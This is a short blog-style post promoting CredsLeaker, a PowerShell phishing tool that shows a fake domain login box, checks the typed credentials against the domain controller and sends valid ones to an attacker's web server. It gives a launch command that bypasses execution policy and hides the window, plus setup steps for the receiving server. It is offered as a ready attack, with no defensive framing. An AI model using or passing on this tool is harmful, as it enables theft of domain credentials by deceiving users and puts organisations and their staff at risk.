Phish domain user credentials with CredsLeaker with Powershell

CredsLeaker is a powershell script that phishes information from the user. It will popup a user authentication box – The script will check the details against the domain controller until it has valid credentials.  Normally this screen is pretty common in a domain scenario and the user may have seen this box before.

Once CredsLeaker has found valid credentials it will then send them to a webserver for storage.

You can download the script and view more information on the GitHub project page by clicking here.

The script can be executed with the following command:

powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file “CredsLeaker.ps1”


How to:

  1. Start a web server.
  2. Type your server IP and port in the ps1 script.
  3. Execute the batch file.

Leave a Comment